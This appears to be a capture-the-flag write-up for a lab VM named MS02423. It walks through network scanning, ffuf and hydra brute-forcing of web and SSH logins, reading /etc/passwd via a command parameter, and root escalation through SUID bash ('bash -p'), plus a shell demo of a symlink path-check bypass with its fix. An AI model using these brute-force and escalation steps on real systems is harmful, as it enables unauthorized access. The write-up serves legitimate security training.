┌──(root㉿kali)-[~]
└─# arp-scan -I eth2 -l
Interface: eth2, type: EN10MB, MAC: 00:0c:29:26:ba:7d, IPv4: 192.168.56.121
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:65:4f:3c PCS Systemtechnik GmbH
192.168.56.126 08:00:27:1d:d5:20 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.111 seconds (121.27 hosts/sec). 3 responded

┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-10 23:59 EST
Nmap scan report for 192.168.56.126
Host is up (0.00068s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.59 (Debian)
| http-robots.txt: 6 disallowed entries
| /admin.txt /login.txt .config .backup .user.txt
|_/wp-admin
423/tcp open http Apache httpd 2.4.59 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: MS02423\xE7\xB3\xBB\xE7\xBB\x9F - \xE7\x99\xBB\xE5\xBD\x95
|_http-server-header: Apache/2.4.59 (Debian)
MAC Address: 08:00:27:1D:D5:20 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.56.126

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.59 seconds


Port 423 serves a login page (the nmap title above decodes to "MS02423系统 - 登录", i.e. "MS02423 System - Login"):
[screenshot: image-20260211130842076]

The scan also picked up robots.txt on port 80, with these disallowed entries:

/admin.txt /login.txt .config .backup .user.txt 
|_/wp-admin

.user.txt contains an encoded blob.

Decoding it yields a username list, plus a hint that the password is in a "top 500" list:

admin
john
alice
sysadmin
ctf_player
<-----passwd top 500----->

Capture a login request to see how the form parameters are sent:

[screenshot: image-20260211133111529]

[screenshot: image-20260211131939631]

Brute-force the login with the username list and a top-500 password list:

[screenshot: image-20260211133435637]

This gives the credentials ctf_player:genesis.

[screenshot: image-20260211133523582]

I used ffuf here.

Two filter options worth knowing when brute-forcing a login form with ffuf:

-mc 200 only show responses with HTTP status 200

-fs 1191 hide responses whose body size is 1191 bytes (the size of the failed-login page), so only different-sized responses, i.e. candidate successes, remain

[screenshot: image-20260211135124163]

After logging in, I fuzzed the command parameter by hand. /etc/passwd could be read, but nothing else seemed readable.

[screenshot: image-20260211135228517]

That reveals two local users with interactive shells:

2002:x:1000:1000:2002 User:/home/2002:/bin/bash
MS02423:x:1001:1001:MS02423 User:/home/MS02423:/bin/bash
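Turning the /etc/passwd read into a hydra user list, as an added example (shell, not part of the original write-up): the function below keeps only accounts that can actually log in, so SSH attempts are not wasted on nologin service accounts. The sample passwd data is constructed here and includes the two lines seen on the target; root is kept because the page does not show whether sshd permits root login, so drop it if it does not.

```shell
#!/bin/sh
# Added example: build a hydra user list from a /etc/passwd dump.
# Keeps UID 0 and UIDs >= 1000 whose login shell is a real shell
# (not nologin/false/sync). Not from the original write-up.

# Constructed sample: the two lines seen on the target plus typical
# system accounts that should be filtered out.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
2002:x:1000:1000:2002 User:/home/2002:/bin/bash
MS02423:x:1001:1001:MS02423 User:/home/MS02423:/bin/bash
svc:x:1002:1002:service account:/home/svc:/usr/sbin/nologin'

# login_users: read passwd-format lines on stdin, print one candidate
# username per line (field 1 = name, 3 = uid, 7 = shell).
login_users() {
    awk -F: '
        $3 == 0 || $3 >= 1000 {
            shell = $7
            sub(/.*\//, "", shell)   # basename of the shell, e.g. "bash"
            if (shell != "nologin" && shell != "false" \
                && shell != "sync" && shell != "")
                print $1
        }'
}

# Usage: feed the passwd content read from the target, write users.txt for hydra.
# printf '%s\n' "$SAMPLE_PASSWD" | login_users > users.txt
```

The UID cut-off follows Debian's convention (regular users start at 1000); the shell check matters because nobody has a large UID but /usr/sbin/nologin and would otherwise land in the list.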

From there, brute-force SSH with those usernames; the approach is routine:

┌──(root㉿kali)-[~/yiyi]
└─# hydra -L users.txt -P rockyou.txt ssh://192.168.56.126 -V -I -u -f

[screenshot: image-20260211135607959]

Logging in over SSH with the recovered credentials:

Linux MS02423 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 14 01:02:20 2026 from 192.168.137.102
-bash-5.0$ id
uid=1000(2002) gid=1000(2002) groups=1000(2002)
-bash-5.0$ ls
user.txt
-bash-5.0$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/bash
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
-bash-5.0$ sudo -l
Matching Defaults entries for 2002 on MS02423:
!env_reset, mail_badpass, !env_reset, always_set_home

User 2002 may run the following commands on MS02423:
(ALL) NOPASSWD: /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh
-bash-5.0$ cat /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh
cat: /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh: Permission denied
-bash-5.0$ id /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh
id: '/usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh': no such user
-bash-5.0$ ls -al /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/
total 12
drwxr-xr-x 2 root root 4096 Jan 14 01:22 .
drwxr-xr-x 75 root root 4096 Jan 12 23:33 ..
-rwx------ 1 root root 3244 Jan 14 01:22 gsjy.sh
-bash-5.0$ sudo /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh
==============================================
Generic target query script
==============================================
[Usage] /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh <target path>
==============================================
-bash-5.0$ sudo /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh /root/root.txt
==============================================
Script execution notice
==============================================

[Forbidden] This target cannot be processed!
[Suggestion] Try a different target path.

==============================================
Script execution terminated
==============================================
-bash-5.0$ sudo /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh /home/2002/user.txt
==============================================
Target machine generic target query script
==============================================

[Task] Preparing to process target: /home/2002/user.txt

------------------- Target content -------------------
flag:{user-2b169d1b87972948a3ccc88dd28bde99}
---------------------------------------------------

[Success] Processed target: /home/2002/user.txt

==============================================
Script execution complete
==============================================
-bash-5.0$

So there is a sudo-allowed script that reads files as root, but it refuses /root/root.txt (its source is mode 0700 root, so the check itself cannot be inspected from this account).

The plan is simpler than fighting that check: the find output above shows /usr/bin/bash is SUID root, so `bash -p` (which keeps the effective UID the SUID bit grants instead of dropping it) gives a shell with euid 0, and from there the flag can be read, via a symlink or directly.
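Why a symlink route works against a path check, as an added example (shell). This is a model written for this page, not the target's gsjy.sh, whose source is unreadable from the 2002 account and whose actual check the page does not show. read_naive refuses the protected directory only by comparing the caller-supplied string, so a symlink (or a `..` component) under an allowed path still reaches the denied file; read_resolved canonicalises with `readlink -f` first and closes that gap. Everything runs unprivileged in a temporary directory; the directory layout and flag strings are constructed.

```shell
#!/bin/sh
# Added example: deny-list on a raw path string vs. on the resolved path.
# Not the target's gsjy.sh; a constructed model of a "read this file as root,
# but never anything under /root" helper. Runs unprivileged, touches only $WORK.

# Canonicalise the work dir so later readlink -f results compare cleanly
# (on some systems /tmp itself is a symlink).
WORK=$(readlink -f "$(mktemp -d)")
mkdir -p "$WORK/root" "$WORK/home/user"
printf 'flag:{root-example}\n' > "$WORK/root/root.txt"      # stand-in for /root/root.txt
printf 'flag:{user-example}\n' > "$WORK/home/user/user.txt"  # stand-in for /home/2002/user.txt
ln -s "$WORK/root/root.txt" "$WORK/home/user/link.txt"        # attacker-controlled symlink

# Vulnerable: the deny check looks only at the string the caller passed in.
# A symlink or "../" under an allowed directory passes the check, and cat then
# follows it to the protected file.
read_naive() {
    case "$1" in
        "$WORK/root"/*) echo "DENIED"; return 1 ;;
    esac
    cat -- "$1"
}

# Hardened: resolve symlinks and ".." first, then apply the same check to the
# real path. The symlink now resolves into the protected directory and is refused.
read_resolved() {
    real=$(readlink -f -- "$1") || { echo "DENIED"; return 1; }
    case "$real" in
        "$WORK/root"/*) echo "DENIED"; return 1 ;;
    esac
    cat -- "$real"
}

# Usage (uncomment to see the difference interactively):
# read_naive    "$WORK/home/user/link.txt"   # prints flag:{root-example}
# read_resolved "$WORK/home/user/link.txt"   # prints DENIED
```

With SUID bash on the box the detour is unnecessary, since `bash -p` already gives an euid-0 shell that can read /root/root.txt directly; the example is the caveat for whoever writes or reviews a sudo-allowed helper like this one: resolve the path, then compare, and prefer an allow-list of directories over a deny-list.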

[screenshot: image-20260211140452860]